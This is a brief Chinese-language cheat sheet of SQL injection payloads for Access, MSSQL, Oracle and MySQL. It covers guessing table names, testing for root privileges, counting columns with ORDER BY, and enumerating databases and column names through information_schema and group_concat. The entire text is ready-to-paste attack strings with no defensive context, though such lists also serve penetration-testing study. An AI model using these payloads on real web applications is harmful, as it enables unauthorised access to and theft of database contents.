显错注入
ACCESS
猜表名:
- and exists (select * from admin)
- and 0<>(select count(*) from admin)
MSSQL
猜表名:
- having 1=1
- and (select top 1 name from sysobjects where xtype='u')>0
Oracle
猜表名:
- and 1=2 union select 1,table_name,3 from user_tables
Mysql
猜表名:
- union select 1,table_name,3 from information_schema.tables where table_schema='test'
判断权限:
- and ord(mid(user()),1,1)=114 #此处判断为root,根据更改ascii值114,来判断其他
判断字段数:
- order by 1,2……
查数据库:
- union select 1,2,schema_name from information_schema.schemata
- union select 1,2,database()
查列名:
- union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' #group_concat连接字符串